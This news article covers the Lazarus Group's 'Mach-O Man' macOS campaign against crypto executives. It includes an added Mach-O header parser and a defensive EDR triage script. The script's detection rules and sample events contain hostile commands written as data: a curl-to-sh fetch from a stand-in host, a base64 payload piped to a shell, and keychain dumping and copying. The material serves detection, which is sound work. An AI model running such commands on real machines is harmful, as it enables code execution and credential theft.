Lazarus Group Unleashes Mach-O Man Malware Targeting Crypto Executives on macOS

North Korea’s Lazarus Group has deployed a new macOS malware campaign called “Mach-O Man” that turns ordinary business meeting invites into direct pipelines for credential theft and corporate espionage, according to a warning from CertiK published April 22.

How the Attack Works

The campaign targets fintech and cryptocurrency executives through a social engineering technique called “ClickFix.” Victims receive an apparently urgent meeting invite over Telegram for a Zoom, Microsoft Teams, or Google Meet call. The link leads to a convincing fake website that tells them to copy and paste a command into their Mac’s terminal to fix a “connection issue.”

That single terminal command is all it takes. The malware gains access to corporate systems, SaaS platforms, and financial resources almost instantly.

“It is a modular macOS malware kit created by Lazarus Group’s infamous Chollima division. It uses native Mach-O binaries built for Apple environments where crypto and fintech operate,” said Natalie Newson, a senior blockchain security researcher at CertiK, in an interview with CoinDesk.

Mach-O binaries are the native executable format for macOS. By using Apple’s own file structure, the malware bypasses many traditional antivirus scanners that are better at detecting Windows-based threats.
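Because the whole campaign rides on native Mach-O executables, a responder triaging a file pulled from a suspect Mac needs to recognise the format and see what it declares about itself. The following is an added example, not code from CertiK or the article: a minimal Mach-O header parser that identifies the CPU slice, file type and load commands, and notes whether an `LC_CODE_SIGNATURE` load command is present at all. The magic values and load-command numbers are Apple’s public `mach-o/loader.h` constants; the sample binary is constructed inline from a header and a few load commands and is not a runnable program. It also handles fat (universal) wrappers and stops cleanly on a malformed `cmdsize`, which a reader may meet in deliberately broken samples.

```python
import struct
from dataclasses import dataclass

# Magic values as seen when the first four bytes are read little-endian.
MH_MAGIC = 0xFEEDFACE        # 32-bit image, same byte order as the reader
MH_CIGAM = 0xCEFAEDFE        # 32-bit image, opposite byte order
MH_MAGIC_64 = 0xFEEDFACF     # 64-bit image
MH_CIGAM_64 = 0xCFFAEDFE
FAT_MAGIC = 0xCAFEBABE       # universal (fat) wrapper; always stored big-endian

CPU_TYPES = {0x00000007: "i386", 0x01000007: "x86_64", 0x0000000C: "arm", 0x0100000C: "arm64"}
FILE_TYPES = {1: "MH_OBJECT", 2: "MH_EXECUTE", 6: "MH_DYLIB", 8: "MH_BUNDLE"}
LC_LOAD_DYLIB = 0x0C
LC_SEGMENT_64 = 0x19
LC_UUID = 0x1B
LC_CODE_SIGNATURE = 0x1D
LC_MAIN = 0x80000028
LC_NAMES = {LC_LOAD_DYLIB: "LC_LOAD_DYLIB", LC_SEGMENT_64: "LC_SEGMENT_64", LC_UUID: "LC_UUID",
            LC_CODE_SIGNATURE: "LC_CODE_SIGNATURE", LC_MAIN: "LC_MAIN"}


@dataclass(frozen=True)
class MachOSlice:
    cpu: str
    filetype: str
    load_commands: tuple
    signed: bool  # LC_CODE_SIGNATURE present (ad hoc or real); not proof of a trusted signer


def parse_thin(data):
    """Parse one Mach-O image; return a MachOSlice, or None if the bytes are not Mach-O."""
    if len(data) < 28:
        return None
    magic = struct.unpack("<I", data[:4])[0]
    if magic in (MH_MAGIC, MH_MAGIC_64):
        endian = "<"
    elif magic in (MH_CIGAM, MH_CIGAM_64):
        endian = ">"
    else:
        return None
    is64 = magic in (MH_MAGIC_64, MH_CIGAM_64)
    cputype, _subtype, filetype, ncmds, sizeofcmds, _flags = struct.unpack(endian + "iiIIII", data[4:28])
    off = 32 if is64 else 28            # 64-bit header carries an extra reserved field
    end = min(len(data), off + sizeofcmds)
    cmds, signed = [], False
    for _ in range(ncmds):
        if off + 8 > end:
            break                       # header claims more commands than the bytes hold
        cmd, cmdsize = struct.unpack(endian + "II", data[off:off + 8])
        if cmdsize < 8 or off + cmdsize > end:
            break                       # malformed cmdsize: stop instead of looping or overreading
        cmds.append(LC_NAMES.get(cmd, f"LC_0x{cmd:x}"))
        signed = signed or cmd == LC_CODE_SIGNATURE
        off += cmdsize
    return MachOSlice(CPU_TYPES.get(cputype, f"cpu_0x{cputype:x}"),
                      FILE_TYPES.get(filetype, f"filetype_{filetype}"), tuple(cmds), signed)


def parse_macho(data):
    """Return a list of slices, one per architecture; handles thin and fat binaries."""
    if len(data) >= 8 and struct.unpack(">I", data[:4])[0] == FAT_MAGIC:
        nfat = struct.unpack(">I", data[4:8])[0]   # Java class files share this magic; their slices fail parse_thin
        slices = []
        for i in range(nfat):
            rec = data[8 + 20 * i: 8 + 20 * (i + 1)]
            if len(rec) < 20:
                break
            _cpu, _sub, offset, size, _align = struct.unpack(">IIIII", rec)
            s = parse_thin(data[offset:offset + size])
            if s:
                slices.append(s)
        return slices
    s = parse_thin(data)
    return [s] if s else []


def build_sample(signed):
    """Constructed arm64 MH_EXECUTE header plus load commands (assumed sample, not a real program)."""
    cmds = struct.pack("<II16s", LC_UUID, 24, b"\x11" * 16)
    cmds += struct.pack("<IIQQ", LC_MAIN, 24, 0x1000, 0)
    if signed:
        cmds += struct.pack("<IIII", LC_CODE_SIGNATURE, 16, 0x4000, 0x200)
    ncmds = 3 if signed else 2
    header = struct.pack("<IiiIIIII", MH_MAGIC_64, 0x0100000C, 0, 2, ncmds, len(cmds), 0x200085, 0)
    return header + cmds


def build_fat(slices):
    """Wrap thin images in a fat header (no page alignment; the parser does not need it)."""
    table, body, offset = b"", b"", 8 + 20 * len(slices)
    for s in slices:
        cpu = struct.unpack("<i", s[4:8])[0]
        table += struct.pack(">iIIII", cpu, 0, offset, len(s), 0)
        body += s
        offset += len(s)
    return struct.pack(">II", FAT_MAGIC, len(slices)) + table + body


if __name__ == "__main__":
    for s in parse_macho(build_fat([build_sample(False), build_sample(True)])):
        print(s)
```

An image with no `LC_CODE_SIGNATURE` at all is worth a second look on any Mac that runs crypto tooling, but the reverse is not reassuring: ad hoc signatures also produce that load command, so the real check is still `codesign -dv --verify` and notarization status on the host.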

A Month of Devastation

The timing of Mach-O Man’s emergence is chilling. Over the past two weeks alone, Lazarus Group has been linked to more than $500 million in losses from the Drift Protocol ($285 million) and KelpDAO ($292 million) exploits. When combined with the new malware campaign, the collective picture is one of a state-backed hacking operation running at peak capacity.

“What makes Lazarus especially dangerous right now is their activity level,” Newson said. “KelpDAO, Drift, and now a new macOS malware kit, all within the same month. This isn’t random hacking; it’s a state-directed financial operation running at a scale and speed typical of institutions.”

According to blockchain analytics firm Chainalysis, Lazarus Group’s cumulative crypto theft since 2017 is estimated at $6.7 billion.

Fake Cloudflare Pages Add Another Attack Vector

Security researcher Vladimir S. identified on X several variations of the Mach-O Man attack. In some cases, Lazarus operatives have hijacked DeFi project domains, replacing legitimate websites with fake Cloudflare verification pages that prompt visitors to enter a terminal command for “verification.”

“These fake verification steps guide victims through keyboard shortcuts that run a harmful command,” Newson explained. “The page looks real, the instructions seem normal, and the victim initiates the action themselves – which is why traditional security controls often miss it.”

Mauro Eldritch, security expert and founder of threat intelligence firm BCA Ltd, described the ClickFix delivery method in technical detail, noting that the campaign is designed to leave minimal forensic traces. The malware erases itself after execution.

Why Most Victims Won’t Know They’ve Been Hit

Unlike ransomware attacks that announce themselves, Mach-O Man operates silently. By the time a firm discovers the breach, the malware has already exfiltrated credentials and keychain data and then deleted its own traces.

“They likely don’t know it yet,” Newson said of current victims. “If they do, they probably can’t identify which variant affected them.”

The implications extend beyond individual losses. If the malware harvests private keys or multisig credentials from DeFi project maintainers, it could lead to the kind of protocol-level exploits that have defined April 2026.

How Crypto Firms Can Protect Themselves

CertiK and other security researchers recommend the following measures:

  • Never paste terminal commands from external sources. No legitimate video conferencing platform requires manual terminal fixes.
  • Verify meeting invites through official channels. If someone contacts you via Telegram about an urgent call, confirm through a separate communication channel.
  • Deploy Endpoint Detection and Response (EDR) tools that monitor for suspicious Mach-O binary execution and keychain access.
  • Use hardware wallets and air-gapped signing for treasury operations. Compromised macOS credentials should never provide direct access to protocol funds.
  • Treat Lazarus as a persistent nation-state threat, not an occasional attacker. “The crypto industry needs to start viewing Lazarus the same way banks view nation-state cyber actors,” Newson warned.
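The third recommendation above asks for endpoint telemetry that flags pasted terminal commands and keychain access. As an added example (not CertiK’s or any vendor’s rule set), here is a small triage pass over process-execution events of the kind an EDR agent or macOS endpoint security extension exports: the event shape, the process names and the sample command lines are all constructed for this example, and the patterns are assumptions about what a ClickFix-style paste and a keychain grab tend to look like, not signatures from the campaign itself. Findings also record whether the parent was an interactive terminal, which is the tell-tale of a user having pasted the command as the fake meeting page instructed.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-execution record; the field layout is an assumption of this example."""
    parent: str    # name of the parent process
    process: str   # name of the executed process
    cmdline: str   # full command line as reported by the agent


@dataclass(frozen=True)
class Finding:
    index: int           # position of the event in the input
    rules: tuple         # names of the heuristics that matched
    from_terminal: bool  # parent is an interactive terminal: consistent with a pasted command


# Heuristic patterns (assumed for this example, not published detection content).
RULES = (
    ("download piped to shell",
     re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(sudo\s+)?(sh|bash|zsh)\b")),
    ("base64-decoded payload piped to interpreter",
     re.compile(r"\bbase64\s+(-d|-D|--decode)\b[^|;]*\|\s*(sh|bash|zsh|python3?)\b")),
    ("keychain dump via security CLI",
     re.compile(r"\bsecurity\s+(dump-keychain|find-(generic|internet)-password)\b")),
    ("direct access to keychain database files",
     re.compile(r"/Library/Keychains/")),
)
TERMINAL_HOSTS = frozenset({"Terminal", "iTerm2"})


def scan(events):
    """Return a Finding for every event that matches at least one rule, in input order."""
    findings = []
    for i, ev in enumerate(events):
        hits = tuple(name for name, rx in RULES if rx.search(ev.cmdline))
        if hits:
            findings.append(Finding(i, hits, ev.parent in TERMINAL_HOSTS))
    return findings


# Constructed sample telemetry; none of these are real captures.
SAMPLE_EVENTS = (
    ProcEvent("Terminal", "zsh", "curl -fsSL https://meeting-fix.invalid/fix.sh | sh"),
    ProcEvent("Terminal", "zsh", "git status"),
    ProcEvent("zoom.us", "security", "/usr/bin/security dump-keychain -d login.keychain-db"),
    ProcEvent("Terminal", "zsh", "echo aGVsbG8= | base64 -D | sh"),
    ProcEvent("Terminal", "cp", "cp /Users/alice/Library/Keychains/login.keychain-db /tmp/k"),
    ProcEvent("Xcode", "clang", "clang -o app main.c"),
)


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[f.index]
        origin = "pasted in terminal" if f.from_terminal else f"spawned by {ev.parent}"
        print(f"[{origin}] {ev.cmdline!r}: {', '.join(f.rules)}")
```

Two of the sample hits come from a non-terminal parent, which matters because a video-conferencing client has no business launching the `security` tool; an alert rule keyed only on Terminal-spawned shells would miss it. Command lines can of course be obfuscated past these patterns, so this is a first filter for human review, not a replacement for an EDR that also watches file reads of the keychain database and binary self-deletion.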

FAQ

What’s the Mach-O Man malware?

Mach-O Man is a modular macOS malware kit developed by North Korea’s Lazarus Group. It uses native Apple binary formats and social engineering (fake meeting invites) to trick crypto and fintech executives into running malicious terminal commands that steal credentials and corporate data.

How much has Lazarus Group stolen from crypto?

Since 2017, Lazarus Group has accumulated an estimated $6.7 billion in crypto theft, according to Chainalysis. In April 2026 alone, they’re linked to over $500 million in losses from the Drift Protocol and KelpDAO exploits.

How can crypto firms defend against Mach-O Man?

Never execute terminal commands from untrusted meeting links, verify all meeting invites through official channels, deploy macOS-specific endpoint detection tools, and use hardware wallets for all treasury operations. The malware self-destructs after execution, making prevention the only reliable defence.

CryptoGazette Editorial

Crypto Reporter

The CryptoGazette Editorial team covers breaking cryptocurrency news, market analysis, DeFi developments, and blockchain technology. Our journalists bring years of experience in digital assets and financial markets to deliver accurate, timely reporting.